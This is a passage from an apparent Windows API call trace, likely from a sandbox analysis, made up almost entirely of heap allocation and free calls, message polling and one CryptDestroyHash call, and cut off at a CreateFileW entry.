0x2e54fc8 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0256.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0256.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0256.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0256.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0256.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0256.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0256.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0256.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0256.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0256.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0256.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0256.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0256.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.478] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0256.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0256.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0256.479] CryptDestroyHash (hHash=0xa87490) returned 1 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0256.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0256.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0256.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0256.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0256.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0256.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0256.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0256.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0256.483] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0256.484] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0256.484] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0256.484] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0256.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0256.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0256.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.485] CreateFileW 